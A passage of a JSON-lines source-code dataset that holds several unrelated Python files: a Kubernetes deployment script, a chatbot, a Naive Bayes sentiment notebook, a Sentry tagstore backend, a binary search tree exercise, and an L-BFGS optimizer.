logger.get().debug(cmd)\n for ip in self.kube_other_master_ipaddr:\n logger.get().info(\"初始化子master节点: {}\".format(ip))\n Copy(self.conf.ssh_user, ip, src, dest)\n RunCmdHost(self.conf.ssh_user, ip, cmd)\n\n def init_network_plugin(self):\n logger.get().info(\"初始化网络插件flannel\")\n render.fill_network_plugin(self.conf)\n cmd = DEPLOY_NETWORK_PLUGIN.format(PLUGIN_CONFIG=self.kube_network_plugin)\n src = os.path.join(self.plugin_dir, \"kube-{}.yaml\".format(self.conf.kube_network_plugin_name))\n dest = self.kube_network_plugin\n logger.get().debug(cmd)\n Copy(self.conf.ssh_user, self.kube_first_master_ipaddr, src, dest)\n RunCmdHost(self.conf.ssh_user, self.kube_first_master_ipaddr, cmd)\n\n def join_cluster(self):\n cmd = self.generic_admin_token()\n logger.get().debug(cmd)\n for ip in self.conf.node[\"servers\"]:\n logger.get().info(\"node节点: {} 加入\".format(ip))\n RunCmdHost(self.conf.ssh_user, ip, cmd)\n\n def generic_admin_token(self):\n logger.get().info(\"生成kubeadmin token\")\n cmd = GENERIC_ADMIN_TOKEN.format(CONFIG_PATH=self.init_config_file)\n logger.get().debug(cmd)\n ret = RunCmdHostWithReturns(\n self.conf.ssh_user, self.kube_first_master_ipaddr, cmd\n )\n return re.findall(r\"kubeadm.*\", ret)[0]\n\n def cp_config(self):\n logger.get().info(\"生成kubectl config文件\")\n RunCmdHost(self.conf.ssh_user, self.kube_first_master_ipaddr, \"mkdir ~/.kube\")\n RunCmdHost(\n self.conf.ssh_user,\n self.kube_first_master_ipaddr,\n \"cp /etc/kubernetes/admin.conf ~/.kube/config\",\n )\n\n def check_cluster_status(self):\n logger.get().info(\"查看node状态\")\n RunCmdHost(\n self.conf.ssh_user, self.kube_first_master_ipaddr, \"kubectl get node\"\n )\n\n def check_network_pods_status(self):\n logger.get().info(\"查看网络插件状态\")\n RunCmdHost(\n self.conf.ssh_user,\n self.kube_first_master_ipaddr,\n \"kubectl get po -n kube-system | grep flannel\",\n )\n\n def reset(self, ips):\n logger.get().info(\"重置k8s环境\")\n RunCmdHost(self.conf.ssh_user, self.kube_first_master_ipaddr, \"rm -fr ~/.kube\")\n for ip in ips:\n RunCmdHost(self.conf.ssh_user, ip, \"kubeadm reset -f\")\n\n def remove_taint(self):\n cmd = \"kubectl taint nodes {} node-role.kubernetes.io/master-\"\n for i in range(len(self.kube_other_master_ipaddr)):\n node = \"%s%02d\" % (self.conf.node[\"server_name_prefix\"], i + 2)\n logger.get().info(\"移除{}上的taint\".format(node))\n cmd = cmd.format(node)\n logger.get().debug(cmd)\n RunCmdHost(self.conf.ssh_user, self.kube_first_master_ipaddr, cmd)\n","repo_name":"liyehaha/test-k","sub_path":"Kube/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":5368,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"226280456","text":"class Solution(object):\n def numPairsDivisibleBy60(self, time):\n \"\"\"\n :type time: List[int]\n :rtype: int\n \"\"\"\n remainders = collections.defaultdict(int)\n ret = 0\n for t in time:\n if t % 60 == 0:\n ret += remainders[0]\n else:\n ret += remainders[60-t%60]\n remainders[t%60] += 1\n return ret\n ","repo_name":"danieljbae/leetcode_archive","sub_path":"concepts/Arrays/q1010_PairsofSongsWithTotalDurations.py","file_name":"q1010_PairsofSongsWithTotalDurations.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34907234581","text":"import os\nimport nltk\nnltk.download('punkt')\nfrom nltk.stem.lancaster import LancasterStemmer\nstemmer = LancasterStemmer()\n\nimport numpy as np\n\nimport tensorflow as tf\nimport random\nimport json\n\n# Get the path to the current directory\ndir_path = os.path.dirname(os.path.realpath(__file__))\n\n# Load the model and words/labels\nmodel_path = os.path.join(dir_path, 'model.h5')\nmodel = tf.keras.models.load_model(model_path)\n\nwith open(os.path.join(dir_path, 'intents.json')) as file:\n data = json.load(file)\n\nwords = []\nlabels = []\ndocs_x = []\ndocs_y = []\n\n# Loop through each intent and tokenize the words\nfor intent in data['intents']:\n for pattern in intent['patterns']:\n # Tokenize each word in the pattern\n tokenized_words = nltk.word_tokenize(pattern)\n words.extend(tokenized_words)\n docs_x.append(tokenized_words)\n docs_y.append(intent['tag'])\n if intent['tag'] not in labels:\n labels.append(intent['tag'])\n\n# Stem and sort the words\nwords = [stemmer.stem(w.lower()) for w in words if w not in '?']\nwords = sorted(list(set(words)))\nlabels = sorted(labels)\n\n# Generate a bag of words for the input\ndef bag_of_words(s, words):\n bag = [0 for _ in range(len(words))]\n\n s_words = nltk.word_tokenize(s)\n s_words = [stemmer.stem(word.lower()) for word in s_words]\n\n for se in s_words:\n for i, w in enumerate(words):\n if w == se:\n bag[i] = 1\n\n return np.array(bag)\n\n# Start the chat loop\nwhile True:\n user_input = input(\"You: \")\n if user_input.lower() == 'quit':\n break\n\n results = model.predict([bag_of_words(user_input, words)])\n results_index = np.argmax(results)\n tag = labels[results_index]\n\n for intent in data['intents']:\n if intent['tag'] == tag:\n responses = intent['responses']\n\n print(random.choice(responses))\n","repo_name":"Ephraim-blessing-mwereza/mental-health-chat-bot-v2","sub_path":"chatbot.py","file_name":"chatbot.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71426749160","text":"# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load in \n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\nimport nltk \nfrom nltk.corpus import stopwords\n#to remove HTML tags from the doc\nfrom bs4 import BeautifulSoup \n#removing numbers,punctuations,i.e regular expressions from the doc\nimport re\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.model_selection import train_test_split,StratifiedKFold\nfrom sklearn import metrics\nfrom sklearn.metrics import accuracy_score, f1_score\n\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.naive_bayes import BernoulliNB\n\nimport os\nprint(os.listdir(\"../input\"))\n\ntrain_data = pd.read_csv(\"../input/labeledTrainData.tsv\", header=0, delimiter=\"\\t\", quoting=3)\ntrain_data.shape\ntrain_data.head(5)\n# view the first review\ntrain_data.review[0]\n# html tags and comments are removed and stored in sample1\n\nsample1 = BeautifulSoup(train_data.review[0],\"html.parser\")\n\n# using get_text() we can see only text in html doc\n\nprint(sample1.get_text())\n# a '^' within square brackets searches anything other than the one on it\n# hence here it matches everything from numbers and punctuations etc , leaving only the words\n\nletters_only = re.sub(\"[^a-zA-Z]\",\" \",sample1.get_text())\nprint(letters_only)\n# changing all the words to lowercase to create a bag of words later\n\nlower_case = letters_only.lower()\n\n# the whole doc is now split to create an array from which most common words called \"stop words\" will be removed\n\nwords = lower_case.split()\nimport nltk\nnltk.download('stopwords')\n\n# most common stopwords used in english language\n\nprint(stopwords.words(\"english\"))\n# removing stopwords from sample1 so that relevant words can be filtered out and stored in words\n\nwords = [w for w in words if w not in stopwords.words(\"english\")]\nprint(words)\n# the above code cleans only one review , let's make a function to clean all the reviews\ndef review_to_words(raw_review):\n #remove html using BeautifulSoup\n review_text = BeautifulSoup(raw_review,\"html.parser\").get_text()\n #removing raw letters,numbers,punctuations\n letters_only = re.sub(\"[^a-zA-Z]\",\" \",review_text)\n #creating an array , resolving whitespaces\n words = letters_only.lower().split()\n #create an array of stopwords so that we don't have to access corpus to search for a stopword\n stop = set(stopwords.words(\"english\"))\n #removing stopwords from the raw_review\n meaningful_words = [w for w in words if w not in stop]\n #return a string with only the words that are important\n return(\" \".join(meaningful_words))\n# finding the number of reviews\nnum_rev = train_data.review.size\nprint(num_rev)\n# storing all cleaned reviews in one place\n\ncleaned_rev = []\nfor i in range(num_rev):\n cleaned_rev.append(review_to_words(train_data.review[i]))\n# creating a function, vectorizer to convert the words into vectors\n\nvectorizer = CountVectorizer(analyzer=\"word\",\n preprocessor=None,\n stop_words=\"english\",\n max_features=5000)\n# converting reviews from text into features\n\ntrain_data_features = vectorizer.fit_transform(cleaned_rev)\n\n#change the classifier into array\n\ntrain_data_features = train_data_features.toarray()\nX = train_data_features\n\n#dependent variable,y will be 1 for positive and 0 for negative review\n\ny = train_data.sentiment \n# 25000 rows and 5000 features\n\nprint (X.shape) \nprint (y.shape) \n# splitting the training data into test and train\n\nX_train, X_test, y_train, y_test = train_test_split(X, y,test_size=0.25,random_state=123)\n# Applying MultinomialNaiveBayes for classification \n\nnaive = MultinomialNB()\nclassifier = naive.fit(X_train,y_train)\npredict = classifier.predict(X_test)\n\nfrom sklearn.metrics import confusion_matrix\n\ncm = confusion_matrix(predict,y_test)\ncm\naccuracy = cm.trace()/cm.sum()\nprint(accuracy)\n# loading test data for prediction\n\ntest_data = pd.read_csv(\"../input/testData.tsv\",header=0, delimiter=\"\\t\", quoting=3)\ntest_data.head(2)\n# preprocessing of test data\n\nnumber_of_review = len(test_data[\"review\"])\nprint(number_of_review)\n\n# removing all punctuations,numbers, etc from test data\n\nclean_review =[]\nfor i in range(number_of_review):\n clean_review.append(review_to_words(test_data[\"review\"][i]))\n \n# converting text into features and features to array\n\ntest_data_features = vectorizer.fit_transform(clean_review)\ntest_data_features = test_data_features.toarray()\n\n# predicting test data by the classifier\n\ny_pred_M = classifier.predict(test_data_features)\n\n# accuracy and f1 score\n\nprint(accuracy_score(y,y_pred_M))\nprint(f1_score(y,y_pred_M))\n# Applying BernolliNaiveBayes Classifier to training data \n\nBernNB = BernoulliNB(binarize = 0.01)\nBernNB.fit(X_train,y_train)\nprint(BernNB)\n\n# applying classifier to the test data\n\ny_pred_B = BernNB.predict(test_data_features)\nprint (accuracy_score(y,y_pred_B))\nprint (f1_score(y,y_pred_B))\n\n# since accuracy and f1_score are slightly higher in MultinomialNaiveBayes, \n# predicted value of that model is used for the submission.\n\n# Copy the results to a pandas dataframe with an \"id\" column and\n# a \"sentiment\" column\n\noutput = pd.DataFrame( data={\"id\":test_data[\"id\"], \"sentiment\": y_pred_M} )\n\n# Use pandas to write the comma-separated output file\n\noutput.to_csv( \"Bag_of_Words_model.csv\", index=False, quoting=3 )","repo_name":"aorursy/new-nb-3","sub_path":"ganguly069_bag-of-words-with-naive-bayes.py","file_name":"ganguly069_bag-of-words-with-naive-bayes.py","file_ext":"py","file_size_in_byte":5585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"38442943605","text":"from django.conf import settings\nfrom django_cron import CronJobBase, Schedule\n\n\nclass TrainModel(CronJobBase):\n RUN_EVERY_MINS = 1 if settings.DEBUG else 60\n\n schedule = Schedule(run_every_mins=RUN_EVERY_MINS)\n code = 'Update the Training Model'\n\n def do(self):\n exec(open(\"matchability_lib/matcha.py\").read(), globals())\n","repo_name":"felixsimard/aiesecmatchability","sub_path":"matchability_api/matchability_api/api/cron.py","file_name":"cron.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"2151607604","text":"class TreeNode:\n def __init__(self):\n self.data = None\n self.left = None\n self.right = None\n\n\nroot = None\nnameAry = ['블랙핑크', '레드벨벳', '마마무', '에이핑크', '걸스데이', '트와이스', '잇지', '여자친구']\n\nnode = TreeNode()\nnode.data = nameAry[0]\nroot = node\n\nfor name in nameAry[1:]:\n node = TreeNode()\n node.data = name\n\n current = root\n while True:\n if name < current.data:\n if current.left is None:\n current.left = node\n break\n current = current.left\n else:\n if current.right is None:\n current.right = node\n break\n current = current.right\n\nprint(\"이진 탐색 트리 구성 완료\")\n\ndelete_name = input(\"삭제할 그룹 이름 : \")\n\ncurrent = root\nparent = None\nwhile True:\n if delete_name == current.data:\n\n if current.left is None and current.right is None:\n if parent.left is current:\n parent.left = None\n else:\n parent.right = None\n del current\n elif current.left is not None and current.right is None:\n if parent.left is current:\n parent.left = current.left\n else:\n parent.right = current.left\n del current\n elif current.left is None and current.right is not None:\n if parent.left is current:\n parent.left = current.left\n else:\n parent.right = current.left\n del current\n print(f\"{delete_name} 가 삭제 됨\")\n break\n elif delete_name < current.data:\n if current.left is None:\n print(f\"{delete_name} 가 트리에 없음\")\n break\n parent = current\n current = current.left\n else:\n if current.right is None:\n print(f\"{delete_name} 가 트리에 없음\")\n break\n parent = current\n current = current.right\n\n\n","repo_name":"coliny123/Algorithm","sub_path":"binary_search_tree.py","file_name":"binary_search_tree.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14905249996","text":"from collections import Counter\nimport re\n\n\ndef letsCount(path):\n \n f = open(path, \"r\") \n data = f.read() \n \n data = data.lower()\n \n data = re.sub(\"[^\\w ]\", \"\", data)\n \n def Convert(tup, di):\n for a, b in tup:\n di.setdefault(a, []).append(b)\n return di\n \n output_data = {}\n \n \n words = data.split(\" \")\n Counter(words)\n \n filtered = Counter(words).most_common(30)\n # print(filtered)\n \n Convert(filtered, output_data)\n # print(output_data)\n \n \n #driver\n for words, count in output_data.items():\n print (words, \":\", count)","repo_name":"SidLabs-Online/KeyWords_Parser_Py","sub_path":"counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"33085399724","text":"from __future__ import absolute_import\n\nimport functools\nfrom collections import defaultdict\nfrom datetime import timedelta\nfrom dateutil.parser import parse as parse_datetime\nfrom django.utils import timezone\nimport six\n\nfrom sentry.tagstore import TagKeyStatus\nfrom sentry.tagstore.base import TagStorage\nfrom sentry.tagstore.exceptions import (\n GroupTagKeyNotFound,\n GroupTagValueNotFound,\n TagKeyNotFound,\n TagValueNotFound,\n)\nfrom sentry.tagstore.types import TagKey, TagValue, GroupTagKey, GroupTagValue\nfrom sentry.utils import snuba\nfrom sentry.utils.dates import to_timestamp\n\n\nSEEN_COLUMN = 'timestamp'\n\n\ntag_value_data_transformers = {\n 'first_seen': parse_datetime,\n 'last_seen': parse_datetime,\n}\n\n\ndef fix_tag_value_data(data):\n for key, transformer in tag_value_data_transformers.items():\n if key in data:\n data[key] = transformer(data[key])\n return data\n\n\nclass SnubaTagStorage(TagStorage):\n\n def get_time_range(self, days=90):\n \"\"\"\n Returns the default (start, end) time range for querrying snuba.\n \"\"\"\n # TODO this should use the per-project retention figure to limit\n # the query to looking at only the retention window for the project.\n end = timezone.now()\n return (end - timedelta(days=days), end)\n\n def __get_tag_key(self, project_id, group_id, environment_id, key):\n start, end = self.get_time_range()\n tag = 'tags[{}]'.format(key)\n filters = {\n 'project_id': [project_id],\n 'environment': [environment_id],\n }\n if group_id is not None:\n filters['issue'] = [group_id]\n conditions = [[tag, '!=', '']]\n aggregations = [['uniq', tag, 'unique_values']]\n\n result = snuba.query(start, end, [], conditions, filters, aggregations,\n referrer='tagstore.__get_tag_key')\n if result == 0:\n raise TagKeyNotFound if group_id is None else GroupTagKeyNotFound\n else:\n data = {\n 'key': key,\n 'values_seen': result,\n }\n if group_id is None:\n return TagKey(**data)\n else:\n return GroupTagKey(group_id=group_id, **data)\n\n def __get_tag_keys(self, project_id, group_id, environment_id, limit=1000):\n start, end = self.get_time_range()\n filters = {\n 'project_id': [project_id],\n 'environment': [environment_id],\n }\n if group_id is not None:\n filters['issue'] = [group_id]\n aggregations = [['uniq', 'tags_value', 'values_seen']]\n\n result = snuba.query(start, end, ['tags_key'], [], filters,\n aggregations, limit=limit, orderby='-values_seen',\n referrer='tagstore.__get_tag_keys')\n\n if group_id is None:\n ctor = TagKey\n else:\n ctor = functools.partial(GroupTagKey, group_id=group_id)\n\n return set([ctor(key=key, values_seen=values_seen)\n for key, values_seen in six.iteritems(result) if values_seen])\n\n def __get_tag_value(self, project_id, group_id, environment_id, key, value):\n start, end = self.get_time_range()\n tag = 'tags[{}]'.format(key)\n filters = {\n 'project_id': [project_id],\n 'environment': [environment_id],\n }\n if group_id is not None:\n filters['issue'] = [group_id]\n conditions = [[tag, '=', value]]\n aggregations = [\n ['count()', '', 'times_seen'],\n ['min', SEEN_COLUMN, 'first_seen'],\n ['max', SEEN_COLUMN, 'last_seen'],\n ]\n\n data = snuba.query(start, end, [], conditions, filters, aggregations)\n if not data['times_seen'] > 0:\n raise TagValueNotFound if group_id is None else GroupTagValueNotFound\n else:\n data.update({\n 'key': key,\n 'value': value,\n })\n if group_id is None:\n return TagValue(**fix_tag_value_data(data))\n else:\n return GroupTagValue(group_id=group_id, **fix_tag_value_data(data))\n\n def __get_tag_values(self, project_id, group_id, environment_id, key):\n start, end = self.get_time_range()\n tag = 'tags[{}]'.format(key)\n filters = {\n 'project_id': [project_id],\n 'environment': [environment_id],\n }\n if group_id is not None:\n filters['issue'] = [group_id]\n conditions = [[tag, '!=', '']]\n aggregations = [\n ['count()', '', 'times_seen'],\n ['min', SEEN_COLUMN, 'first_seen'],\n ['max', SEEN_COLUMN, 'last_seen'],\n ]\n\n result = snuba.query(start, end, [tag], conditions, filters, aggregations,\n referrer='tagstore.__get_tag_values')\n\n if group_id is None:\n ctor = TagValue\n else:\n ctor = functools.partial(GroupTagValue, group_id=group_id)\n\n return set([ctor(key=key, value=value, **fix_tag_value_data(data))\n for value, data in result.items()])\n\n def get_tag_key(self, project_id, environment_id, key, status=TagKeyStatus.VISIBLE):\n assert status is TagKeyStatus.VISIBLE\n return self.__get_tag_key(project_id, None, environment_id, key)\n\n def get_tag_keys(self, project_id, environment_id, status=TagKeyStatus.VISIBLE):\n assert status is TagKeyStatus.VISIBLE\n return self.__get_tag_keys(project_id, None, environment_id)\n\n def get_tag_value(self, project_id, environment_id, key, value):\n return self.__get_tag_value(project_id, None, environment_id, key, value)\n\n def get_tag_values(self, project_id, environment_id, key):\n return self.__get_tag_values(project_id, None, environment_id, key)\n\n def get_group_tag_key(self, project_id, group_id, environment_id, key):\n return self.__get_tag_key(project_id, group_id, environment_id, key)\n\n def get_group_tag_keys(self, project_id, group_id, environment_id, limit=None):\n return self.__get_tag_keys(project_id, group_id, environment_id, limit=limit)\n\n def get_group_tag_value(self, project_id, group_id, environment_id, key, value):\n return self.__get_tag_value(project_id, group_id, environment_id, key, value)\n\n def get_group_tag_values(self, project_id, group_id, environment_id, key):\n return self.__get_tag_values(project_id, group_id, environment_id, key)\n\n def get_group_list_tag_value(self, project_id, group_id_list, environment_id, key, value):\n start, end = self.get_time_range()\n tag = 'tags[{}]'.format(key)\n filters = {\n 'project_id': [project_id],\n 'environment': [environment_id],\n 'issue': group_id_list,\n }\n conditions = [\n [tag, '=', value]\n ]\n aggregations = [\n ['count()', '', 'times_seen'],\n ['min', SEEN_COLUMN, 'first_seen'],\n ['max', SEEN_COLUMN, 'last_seen'],\n ]\n\n result = snuba.query(start, end, ['issue'], conditions, filters, aggregations,\n referrer='tagstore.get_group_list_tag_value')\n\n return {\n issue: GroupTagValue(\n group_id=issue,\n key=key,\n value=value,\n **fix_tag_value_data(data)\n ) for issue, data in six.iteritems(result)\n }\n\n def get_group_tag_value_count(self, project_id, group_id, environment_id, key):\n start, end = self.get_time_range()\n tag = 'tags[{}]'.format(key)\n filters = {\n 'project_id': [project_id],\n 'environment': [environment_id],\n 'issue': [group_id],\n }\n conditions = [[tag, '!=', '']]\n aggregations = [['count()', '', 'count']]\n\n return snuba.query(start, end, [], conditions, filters, aggregations,\n referrer='tagstore.get_group_tag_value_count')\n\n def get_top_group_tag_values(self, project_id, group_id, environment_id, key, limit=3):\n start, end = self.get_time_range()\n tag = 'tags[{}]'.format(key)\n filters = {\n 'project_id': [project_id],\n 'environment': [environment_id],\n 'issue': [group_id],\n }\n conditions = [[tag, '!=', '']]\n aggregations = [\n ['count()', '', 'times_seen'],\n ['min', SEEN_COLUMN, 'first_seen'],\n ['max', SEEN_COLUMN, 'last_seen'],\n ]\n\n result = snuba.query(start, end, [tag], conditions, filters,\n aggregations, limit=limit, orderby='-times_seen',\n referrer='tagstore.get_top_group_tag_values')\n return [\n GroupTagValue(\n group_id=group_id,\n key=key,\n value=value,\n **fix_tag_value_data(data)\n ) for value, data in six.iteritems(result)\n ]\n\n def __get_release(self, project_id, group_id, first=True):\n start, end = self.get_time_range()\n filters = {\n 'project_id': [project_id],\n }\n conditions = [['tags[sentry:release]', 'IS NOT NULL', None]]\n if group_id is not None:\n filters['issue'] = [group_id]\n aggregations = [['min' if first else 'max', SEEN_COLUMN, 'seen']]\n orderby = 'seen' if first else '-seen'\n\n result = snuba.query(start, end, ['tags[sentry:release]'], conditions, filters,\n aggregations, limit=1, orderby=orderby,\n referrer='tagstore.__get_release')\n if not result:\n return None\n else:\n return result.keys()[0]\n\n def get_first_release(self, project_id, group_id):\n return self.__get_release(project_id, group_id, True)\n\n def get_last_release(self, project_id, group_id):\n return self.__get_release(project_id, group_id, False)\n\n def get_release_tags(self, project_ids, environment_id, versions):\n start, end = self.get_time_range()\n filters = {\n 'project_id': project_ids,\n 'environment': [environment_id],\n }\n # NB we add release as a condition rather than a filter because\n # this method is already dealing with version strings rather than\n # release ids which would need to be translated by the snuba util.\n tag = 'sentry:release'\n col = 'tags[{}]'.format(tag)\n conditions = [[col, 'IN', versions]]\n aggregations = [\n ['count()', '', 'times_seen'],\n ['min', SEEN_COLUMN, 'first_seen'],\n ['max', SEEN_COLUMN, 'last_seen'],\n ]\n\n result = snuba.query(start, end, ['project_id', col],\n conditions, filters, aggregations,\n referrer='tagstore.get_release_tags')\n\n values = []\n for project_data in six.itervalues(result):\n for value, data in six.iteritems(project_data):\n values.append(\n TagValue(\n key=tag,\n value=value,\n **fix_tag_value_data(data)\n )\n )\n\n return set(values)\n\n def get_group_ids_for_users(self, project_ids, event_users, limit=100):\n start, end = self.get_time_range()\n filters = {\n 'project_id': project_ids,\n }\n conditions = [\n ['tags[sentry:user]', 'IN', filter(None, [eu.tag_value for eu in event_users])],\n ]\n aggregations = [['max', SEEN_COLUMN, 'last_seen']]\n\n result = snuba.query(start, end, ['issue'], conditions, filters,\n aggregations, limit=limit, orderby='-last_seen',\n referrer='tagstore.get_group_ids_for_users')\n return set(result.keys())\n\n def get_group_tag_values_for_users(self, event_users, limit=100):\n start, end = self.get_time_range()\n filters = {\n 'project_id': [eu.project_id for eu in event_users]\n }\n conditions = [\n ['tags[sentry:user]', 'IN', filter(None, [eu.tag_value for eu in event_users])]\n ]\n aggregations = [\n ['count()', '', 'times_seen'],\n ['min', SEEN_COLUMN, 'first_seen'],\n ['max', SEEN_COLUMN, 'last_seen'],\n ]\n\n result = snuba.query(start, end, ['issue', 'user_id'], conditions, filters,\n aggregations, orderby='-last_seen', limit=limit,\n referrer='tagstore.get_group_tag_values_for_users')\n\n values = []\n for issue, users in six.iteritems(result):\n for name, data in six.iteritems(users):\n values.append(\n GroupTagValue(\n group_id=issue,\n key='sentry:user',\n value=name,\n **fix_tag_value_data(data)\n )\n )\n return values\n\n def get_groups_user_counts(self, project_id, group_ids, environment_id):\n start, end = self.get_time_range()\n filters = {\n 'project_id': [project_id],\n 'environment': [environment_id],\n 'issue': group_ids,\n }\n aggregations = [['uniq', 'tags[sentry:user]', 'count']]\n\n result = snuba.query(start, end, ['issue'], None, filters, aggregations,\n referrer='tagstore.get_groups_user_counts')\n return defaultdict(int, {k: v for k, v in result.items() if v})\n\n def get_tag_value_paginator(self, project_id, environment_id, key, query=None,\n order_by='-last_seen'):\n from sentry.api.paginator import SequencePaginator\n\n if not order_by == '-last_seen':\n raise ValueError(\"Unsupported order_by: %s\" % order_by)\n\n conditions = []\n if query:\n conditions.append(['tags_value', 'LIKE', '%{}%'.format(query)])\n\n start, end = self.get_time_range()\n results = snuba.query(\n start=start,\n end=end,\n groupby=['tags_value'],\n filter_keys={\n 'project_id': [project_id],\n 'environment': [environment_id],\n 'tags_key': [key],\n },\n aggregations=[\n ['count()', '', 'times_seen'],\n ['min', 'timestamp', 'first_seen'],\n ['max', 'timestamp', 'last_seen'],\n ],\n conditions=conditions,\n orderby=order_by,\n # TODO: This means they can't actually paginate all TagValues.\n limit=1000,\n )\n\n tag_values = [\n TagValue(\n key=key,\n value=value,\n **fix_tag_value_data(data)\n ) for value, data in six.iteritems(results)\n ]\n\n desc = order_by.startswith('-')\n score_field = order_by.lstrip('-')\n return SequencePaginator(\n [(int(to_timestamp(getattr(tv, score_field)) * 1000), tv) for tv in tag_values],\n reverse=desc\n )\n\n def get_group_tag_value_iter(self, project_id, group_id, environment_id, key, callbacks=()):\n start, end = self.get_time_range()\n results = snuba.query(\n start=start,\n end=end,\n groupby=['tags_value'],\n filter_keys={\n 'project_id': [project_id],\n 'environment': [environment_id],\n 'tags_key': [key],\n 'issue': [group_id],\n },\n aggregations=[\n ['count()', '', 'times_seen'],\n ['min', 'timestamp', 'first_seen'],\n ['max', 'timestamp', 'last_seen'],\n ],\n orderby='-first_seen', # Closest thing to pre-existing `-id` order\n # TODO: This means they can't actually iterate all GroupTagValues.\n limit=1000,\n )\n\n group_tag_values = [\n GroupTagValue(\n group_id=group_id,\n key=key,\n value=value,\n **fix_tag_value_data(data)\n ) for value, data in six.iteritems(results)\n ]\n\n for cb in callbacks:\n cb(group_tag_values)\n\n return group_tag_values\n\n def get_group_tag_value_paginator(self, project_id, group_id, environment_id, key,\n order_by='-id'):\n from sentry.api.paginator import SequencePaginator\n\n if order_by in ('-last_seen', '-first_seen'):\n pass\n elif order_by == '-id':\n # Snuba has no unique id per GroupTagValue so we'll substitute `-first_seen`\n order_by = '-first_seen'\n else:\n raise ValueError(\"Unsupported order_by: %s\" % order_by)\n\n group_tag_values = self.get_group_tag_value_iter(\n project_id, group_id, environment_id, key\n )\n\n desc = order_by.startswith('-')\n score_field = order_by.lstrip('-')\n return SequencePaginator(\n [(int(to_timestamp(getattr(gtv, score_field)) * 1000), gtv) for gtv in group_tag_values],\n reverse=desc\n )\n\n def get_group_tag_value_qs(self, project_id, group_id, environment_id, key, value=None):\n # This method is not implemented because it is only used by the Django\n # search backend.\n raise NotImplementedError\n\n def get_event_tag_qs(self, project_id, environment_id, key, value):\n # This method is not implemented because it is only used by the Django\n # search backend.\n raise NotImplementedError\n\n def get_group_event_filter(self, project_id, group_id, environment_id, tags):\n start, end = self.get_time_range()\n filters = {\n 'project_id': [project_id],\n 'environment': [environment_id],\n 'issue': [group_id],\n }\n\n conditions = [[['tags[{}]'.format(k), '=', v] for (k, v) in tags.items()]]\n\n result = snuba.raw_query(start, end, selected_columns=['event_id'],\n conditions=conditions, orderby='-timestamp', filter_keys=filters,\n limit=1000, referrer='tagstore.get_group_event_filter')\n\n event_id_set = set(row['event_id'] for row in result['data'])\n\n if not event_id_set:\n return None\n\n return {'event_id__in': event_id_set}\n\n def get_group_ids_for_search_filter(\n self, project_id, environment_id, tags, candidates=None, limit=1000):\n # This method is not implemented since the `group.id` column doesn't\n # exist in Snuba. This logic is implemented in the search backend\n # instead.\n raise NotImplementedError\n","repo_name":"fictional-tribble-2/getsentry--sentry","sub_path":"src/sentry/tagstore/snuba/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":18944,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"29491511475","text":"import numpy as np\nfrom .base import BaseOptimizer\n\nclass L_BFGS(BaseOptimizer):\n \"\"\"\n Implementation of Limited memory BFGS method.\n\n Parameters\n ----------\n M : int\n size of batch (prefer values 3 - 20)\n eps : float\n tolerance value for answer\n MAX_DESC_ITER : int\n number of maximum iterations\n alpha0 : float\n initial vaulue for line search\n c1 : float\n Armijo condition parameter\n \"\"\"\n def __init__(self, M=10, eps=1e-7, MAX_DESC_ITER=2000, alpha0=0.5, c1=0.0001):\n self.M = M\n self.eps = eps\n self.MAX_DESC_ITER = MAX_DESC_ITER\n super().__init__(alpha0=alpha0, c1=c1)\n \n def optimize(self, func, x0):\n \"\"\"\n Calculation of the minima.\n\n Parameters\n ----------\n func : function -> float\n function to minimize\n x0 : ndarray of float\n initial point\n \n Returns\n -------\n xk : ndarray of float\n final iteration point (it is a min point if algorighm converged)\n \"\"\"\n xk = x0\n n = x0.shape[0]\n self.grad_ = self._grad_func(func)\n gfk = self.grad_(xk)\n self.points_ = np.array([x0])\n \n k = 0\n s = np.array([x0])\n y = np.array([gfk])\n \n self.num_steps_ = 0\n while self.num_steps_ < self.MAX_DESC_ITER:\n inv_hfk = np.dot(s[k], y[k]) / np.dot(y[k], y[k]) * np.identity(n)\n \n pk = -self._BFGS_recursion(s, y, gfk, inv_hfk, k)\n alpha_opt = self._line_search(func, xk, pk)\n \n if alpha_opt is None:\n pk = -gfk\n alpha_opt = self._line_search(func, xk, pk)\n \n if alpha_opt is None:\n break\n \n xk_new = xk + alpha_opt*pk\n gfk_new = self.grad_(xk_new)\n \n if k >= self.M-1 or k == 0:\n s = np.delete(s, 0, 0)\n y = np.delete(y, 0, 0)\n else:\n k += 1\n \n s = np.append(s, [xk_new - xk], axis=0)\n y = np.append(y, [gfk_new - gfk], axis=0)\n \n if np.linalg.norm(gfk_new) < self.eps and np.linalg.norm(xk_new - xk) < self.eps:\n break\n \n xk = xk_new\n self.points_ = np.append(self.points_, [xk_new], axis=0)\n gfk = gfk_new\n self.num_steps_ += 1\n return xk\n\n @staticmethod\n def _BFGS_recursion(s, y, gfk, inv_hfk, k):\n \"\"\"\n L-BFGS two-loop recursion algorithm.\n Algorithm 7.4 from Nocedal Wright book.\n\n Parameters\n ----------\n s : ndarray (m, dims) shape of float\n contains differences between points\n y : ndarray (m, dims) shape of float\n contains differences between gradients\n gfk 